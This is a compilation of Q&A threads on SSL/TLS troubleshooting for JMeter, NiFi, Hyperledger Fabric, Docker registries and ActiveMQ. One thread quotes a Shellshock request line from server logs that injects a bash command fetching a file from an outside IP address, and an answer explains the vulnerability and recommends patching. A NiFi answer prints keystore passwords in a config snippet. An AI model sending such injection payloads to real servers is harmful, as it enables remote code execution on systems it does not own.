Jmeter Distributed Testing Not working with two way SSL Handshake - ssl

I have tried to do distributed testing with two servers for a request which requires two way SSL handshaking. This is working fine when we are not using remote hosts for testing
sh jmeter.sh -n -t sample_Load_Test/sample_test.jmx -l sample_report/Log/results.jtl -e -o sample_report/Dashboard/
Jmeter Success:
But on trying to use the remote hosts for the same jmx file, the SSL handshake is failing. I have put the same same jmeter.p12 and truststore.jks in all the servers which are used for distribute testing.
Command used:
sh jmeter.sh -n -t sample_test/sample_load_test.jmx -l sample_report/Log/results.jtl -e -o sample_report/Dashboard/ -r -Jserver.rmi.ssl.disable=true
Please see the error that I am getting
Jmeter Failure:
<httpSample t="20" it="0" lt="0" ct="20" ts="1545068074631" s="false"
lb="HTTP Request" rc="Non HTTP response code:
javax.net.ssl.SSLHandshakeException" rm="Non HTTP response message:
Received fatal alert: handshake_failure"
Does anyone knows what I am doing wrong here

I can think of 2 possible causes:
You use different JRE versions on master and slaves and they have different SSL configuration in terms of storing certificates. Make sure you use exactly the same Java runtime everywhere and configuration is the same.
Your test relies on client certificates and on one of the slaves you don't have them defined in system.properties file or in SSL Manager make sure to use the same JMeter version and the same set of config files and external data files on each slave.
Get used to look into jmeter.log and/or jmeter-server.log files - in the majority of cases you should get the reason of the failure or unexpected behavior from the log.

Related

How to resolve peer unverified exception in a secure nifi cluster?

I set up a secured NiFi cluster with TLS certificates provided by the organisation.On accessing the UI I am getting the error as "javax.net.ssl.SSLPeerUnverifiedException: Hostname abc.com not verified: certificate: sha256/abc/abcabc= DN: CN=abc.com, OU=Abc Operations, O=Abc Corporation Limited, C=SG subjectAltNames: [abc.com]".I have referred the link https://nifi.apache.org/docs/nifi-docs/html/walkthroughs.html#securing-nifi-with-provided-certificates.
Is there anything I missed to enable peer to peer communication while using SSL?
I had same problem and found solution in NiFi TLS-toolkit.
Notion: on my cluster auth worked correctly and problem was only in java verification SSL
Shortly: problem indeed in --subjectAlternativeNames
Generating ssl-keys with own rootCA not worked for me. Good instrunction (but old): https://community.cloudera.com/t5/Community-Articles/How-to-create-user-generated-keys-for-securing-NiFi/ta-p/245551
CentOS Linux 8
NiFi 1.14.0
nifi-toolkit 1.15.2
My way with NiFi TLS-toolkit:
Download nifi-toolkit-*.tar.gz to linux machine (let's ip machine is 0.0.0.1, we need it because this VM will be as "certificateAuthorityHostname") link at this page
sudo wget https://dlcdn.apache.org/nifi/1.15.2/nifi-toolkit-1.15.2-bin.tar.gz
Unarchive it
sudo tar -xvf nifi-toolkit-1.15.2-bin.tar.gz
Generate all keys by long command
../security_output - this dir (or any other name) need to be created before run main command (it's useful to store all key-files in one place)
sudo ./bin/tls-toolkit.sh standalone -h - this help-command to better understand args
OU - equal VM-names in my cluster
!!! --subjectAlternativeNames - it's main reason why raise error javax.net.ssl.SSLPeerUnverifiedException: Hostname <ip / dns> not verified
-O - this arg overwrite your keys in folder, be careful
generaet coomand: sudo ./bin/tls-toolkit.sh standalone --hostnames '0.0.0.1,0.0.0.2,0.0.0.3' -c '0.0.0.1' -C 'CN=0.0.0.1,OU=nifi-prod-cluster-01' -C 'CN=0.0.0.2,OU=nifi-prod-cluster-02' -C 'CN=0.0.0.3,OU=nifi-prod-cluster-03' -O -o ../security_output --subjectAlternativeNames '0.0.0.1,0.0.0.2,0.0.0.3,nifi-prod-cluster-01,nifi-prod-cluster-02,nifi-prod-cluster-03'
After generating keys I archive full dir security_output:
sudo tar -zcvf security_output.tar.gz security_output
And copy this tar/dir to other VM of cluster: to 0.0.0.2 and 0.0.0.3 in my example
Then we need to move keystore.jks and truststore.jks to nifi/conf/ directory near nifi.properties
Edit nifi.properties. Passwords of keys will be in security_output/0.0.0.X/nifi.properties. I replace only this params:
nifi.security.autoreload.enabled=false
nifi.security.autoreload.interval=10 secs
nifi.security.keystore=./conf/keystore.jks
nifi.security.keystoreType=jks
nifi.security.keystorePasswd=34dgsOBKdS+9DGHIm849ALK3JaNBdd738ddsgjfghb4J
nifi.security.keyPasswd=34dgsOBKdS+9DGHIm849ALK3Jaddsgjfghb4J
nifi.security.truststore=./conf/truststore.jks
nifi.security.truststoreType=jks
nifi.security.truststorePasswd=/n1xI9AjcwutNBdd738uOQeQL5O9ALK3i3KwylEYMW5
nifi.security.user.authorizer=single-user-authorizer
nifi.security.allow.anonymous.authentication=false
nifi.security.user.login.identity.provider=single-user-provider
nifi.security.user.jws.key.rotation.period=PT1H
nifi.security.ocsp.responder.url=
nifi.security.ocsp.responder.certificate=
Restart nifi:
sudo service nifi restart && tail -f /opt/nifi/logs/nifi-app.log
UPD. Maybe you want to set one password for keys for all machines (it's easier to setup) or set number of days for keys: https://nifi.apache.org/docs/nifi-docs/html/toolkit-guide.html#standalone
Links:
Usefull link for my guide (but old): https://pierrevillard.com/tag/tls-toolkit/
This helps me find good idea: https://community.cloudera.com/t5/Community-Articles/Using-the-TLS-Toolkit-to-simplify-security/ta-p/247531

Hyperledger Fabric: can't find config for root certificate

I'm trying to build a Hyperledger Fabric network for version 1.4.6. I thought I had finally gotten most of it going. I tried, from the cli image:
peer channel create -o orderer.diro.umontreal.ca:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls --cafile /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem
But the logs for the orderer always said that the TLS connection failed. So then I tried to change --cafile to --certfile. The file in question is a certificate, after all. And I got this:
peer channel create -o orderer.diro.umontreal.ca:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls --certfile /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem
Error: failed to create deliver client: failed to load config for OrdererClient: unable to load orderer.tls.rootcert.file: open : no such file or directory
I have no idea where this orderer.tls.rootcert.file setting comes from. I looked at everywhere I could think of that sets a TLS root certificate for the orderer, including the fabric-ca-server-config.yaml settings file, but I still get that message Apparerntly, I need to set it somewhere extra. I just don't know where. It's set in the base/peer-base.yaml file and I made sure that it now points to current values.
I'm completely out of ideas of where I can set a value that will even change this message. It's not even about giving it the right value; it's just about finding out where to set it.
The orderer container is not able to find the TLS root certificate. Check the path inside docker container corresponding to /var/hyperledger/orderer/tls. I think this folder is empty or atleast cannot find the ca.crt inside it.
If you are using different mount paths, check in the docker-compose file for the orderer container that where you are mounting the following folder inside the it.
crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/tls/
The correct argument is --cafile (--certfile is for your client's certificate when using client authentication). But /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem seems not to exist (according to your second error). Check that path inside your client (with ls, for instance). Maybe the CA certificate has not been included, maybe the file path is not correct (I don't know, "independent" instead of "indepedent"?), maybe the file name...
After checking and fixing that all, if still failing, check your orderer logs.

How can one prevent Apache executing the request line as a bash command?

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
It effectively downloaded the file in question.
Could any one explain how this request manages to actually execute the bash command ?
Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...
This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:
host: ":443" request: "NICK netply" source ip: 127.0.0.1
This is a vulnerability in bash which is exposed via Apache referred to as the "Shellshock" or "bash bug" and allows an attacker to execute arbitrary commands both locally and remotely making it a very serious vulnerability.
You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:
digitalocean.com
shellshocker.net

Docker: What is the simplest way to secure a private registry?

Our Docker images ship closed sources, we need to store them somewhere safe, using own private docker registry.
We search the simplest way to deploy a private docker registry with a simple authentication layer.
I found :
this manual way http://www.activestate.com/blog/2014/01/deploying-your-own-private-docker-registry
and the shipyard/docker-private-registry docker image based on stackbrew/registry and adding basic auth via Nginx - https://github.com/shipyard/docker-private-registry
I think use shipyard/docker-private-registry, but is there one another best way?
I'm still learning how to run and use Docker, consider this an idea:
# Run the registry on the server, allow only localhost connection
docker run -p 127.0.0.1:5000:5000 registry
# On the client, setup ssh tunneling
ssh -N -L 5000:localhost:5000 user#server
The registry is then accessible at localhost:5000, authentication is done through ssh that you probably already know and use.
Sources:
https://blog.codecentric.de/en/2014/02/docker-registry-run-private-docker-image-repository/
https://docs.docker.com/userguide/dockerlinks/
You can also use an Nginx front-end with a Basic Auth and an SSL certificate.
Regarding the SSL certificate I have tried couple of hours to have a working self-signed certificate but Docker wasn't able to work with the registry. To solve this I have a free signed certificate which work perfectly. (I have used StartSSL but there are others).
Also be careful when generating the certificate. If you want to have the registry running at the URL registry.damienroch.com, you must give this URL with the sub-domain otherwise it's not going to work.
You can perform all this setup using Docker and my nginx-proxy image (See the README on Github: https://github.com/zedtux/nginx-proxy).
This means that in the case you have installed nginx using the distribution package manager, you will replace it by a containerised nginx.
Place your certificate (.crt and .key files) on your server in a folder (I'm using /etc/docker/nginx/ssl/ and the certificate names are private-registry.crt and private-registry.key)
Generate a .htpasswd file and upload it on your server (I'm using /etc/docker/nginx/htpasswd/ and the filename is accounts.htpasswd)
Create a folder where the images will be stored (I'm using /etc/docker/registry/)
Using docker run my nginx-proxy image
Run the docker registry with some environment variable that nginx-proxy will use to configure itself.
Here is an example of the commands to run for the previous steps:
sudo docker run -d --name nginx -p 80:80 -p 443:443 -v /etc/docker/nginx/ssl/:/etc/nginx/ssl/ -v /var/run/docker.sock:/tmp/docker.sock -v /etc/docker/nginx/htpasswd/:/etc/nginx/htpasswd/ zedtux/nginx-proxy:latest
sudo docker run -d --name registry -e VIRTUAL_HOST=registry.damienroch.com -e MAX_UPLOAD_SIZE=0 -e SSL_FILENAME=private-registry -e HTPASSWD_FILENAME=accounts -e DOCKER_REGISTRY=true -v /etc/docker/registry/data/:/tmp/registry registry
The first line starts nginx and the second one the registry. It's important to do it in this order.
When both are up and running you should be able to login with:
docker login https://registry.damienroch.com
I have create an almost ready to use but certainly ready to function setup for running a docker-registry: https://github.com/kwk/docker-registry-setup .
Maybe it helps.
Everything (Registry, Auth server, and LDAP server) is running in containers which makes parts replacable as soon as you're ready to. The setup is fully configured to make it easy to get started. There're even demo certificates for HTTPs but they should be replaced at some point.
If you don't want LDAP authentication but simple static authentication you can disable it in auth/config/config.yml and put in your own combination of usernames and hashed passwords.

SSL handshake with ActiveMQ server gives NullPointerException when connecting via SilverTunnel netlib

Summary
Connecting to ActiveMQ via TCP works fine with or without netlib.
Connecting via SSL works fine without netlib but fails with netlib.
Note: I'm using apache-activemq-5.6.0 and silvertunnel.org_netlib-0.14-beta.
This problem occurs whether using netlib's tcpipNetLayer or torNetLayer. However, only the tcpipNetLayer case is considered here to keep things simple.
BTW, SSL + netlib worked fine with the HornetQ messaging server (which implements SSL authentication differently) but HornetQ had problems that led me to try using ActiveMQ.
For convenience I have created a simple test case with a consumer and two different producers.
producer connects without netlib - works fine.
producer-tcpip connects with neltib using the tcpipNetLayer - the following errors occur:
With SSL debugging turned on for ActiveMQ the producer-tcpip program outputs to the console the following error message and then hangs:
ActiveMQ Transport: ssl://null:0, handling exception: java.lang.NullPointerException
This is midway through an SSL handshake because the producer-tcpip program generates the log4j message:
DEBUG org.apache.activemq.transport.failover.FailoverTransport - Attempting 0th connect to: ssl://localhost:61616
DEBUG org.apache.activemq.transport.WireFormatNegotiator - Sending: WireFormatInfo { version=9, properties={MaxFrameSize=104857600, CacheSize=1024, CacheEnabled=true, SizePrefixDisabled=false, MaxInactivityDurationInitalDelay=10000, TcpNoDelayEnabled=true, MaxInactivityDuration=30000, TightEncodingEnabled=true, StackTraceEnabled=true}, magic=[A,c,t,i,v,e,M,Q]}
Then when the producer-tcpip program is killed (e.g. with a ctrl+C) then the activemq.log reports that:
WARN | Transport Connection to: tcp://127.0.0.1:49463 failed: javax.net.ssl.SSLHandshakeException: Remote host closed connection during handshake | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: ssl:///127.0.0.1:49463
ERROR | Could not accept connection from tcp://127.0.0.1:49463: javax.net.ssl.SSLHandshakeException: Remote host closed connection during handshake | org.apache.activemq.broker.TransportConnector | ActiveMQ Task-3
I have no idea what could be causing this or how it can be resolved. Can anyone help?
Steps to reproduce the problem (takes under 15 minutes):
download the test case
wget http://anandavala.info/miscl/testing-AMQ-Netlib-SSL.zip
unzip testing-AMQ-Netlib-SSL.zip
rm testing-AMQ-Netlib-SSL.zip
cd testing-AMQ-Netlib-SSL
Download latest ActiveMQ into the testing directory
wget https://www.apache.org/dist/activemq/apache-activemq/5.6.0/apache-activemq-5.6.0-bin.tar.gz
tar -xzf apache-activemq-5.6.0-bin.tar.gz
rm apache-activemq-5.6.0-bin.tar.gz
Edit conf/activemq.xml to accept ssl
gedit apache-activemq-5.6.0/conf/activemq.xml
replace the transportConnectors entry with the following lines (to enable SSL)
<transportConnectors>
<transportConnector name="ssl" uri="ssl://0.0.0.0:61616?needClientAuth=true"/>
</transportConnectors>
<sslContext>
<sslContext
keyStore="broker.ks" keyStorePassword="password"
trustStore="client.ks" trustStorePassword="password"/>
</sslContext>
start server
cd apache-activemq-5.6.0
bin/activemq start
view logging output
tail -f data/activemq.log
open another console then cd into the testing-AMQ-Netlib-SSL directory
Download latest SilverTunnel netlib into the testing directory
wget http://sourceforge.net/projects/silvertunnel/files/silvertunnel_Netlib/silvertunnel.org_netlib-0.14-beta.zip
unzip silvertunnel.org_netlib-0.14-beta.zip
rm silvertunnel.org_netlib-0.14-beta.zip
compile the source code into three runnable jar files in separate directories
ant
run the consumer
cd consumer
./consumer
open another console then cd into the testing-AMQ-Netlib-SSL/producer directory
run the producer
./producer
let it run for a bit to satisfy yourself that it works then kill the producer by hitting ctrl+C
run the producer-tcpip
cd ../producer-tcpip
./producer-tcpip
let it run for a bit to satisfy yourself that it has stalled at a NullPointerException then kill the producer-tcpip by hitting ctrl+C
notice the debug message in producer-tcpip's output
tail -f logs/output.log
also notice the error message that appears at the bottom of activemq.log (see the tail output from the first console window) or type at the current prompt
tail -f ../apache-activemq-5.6.0/data/activemq.log
Thanks for your help!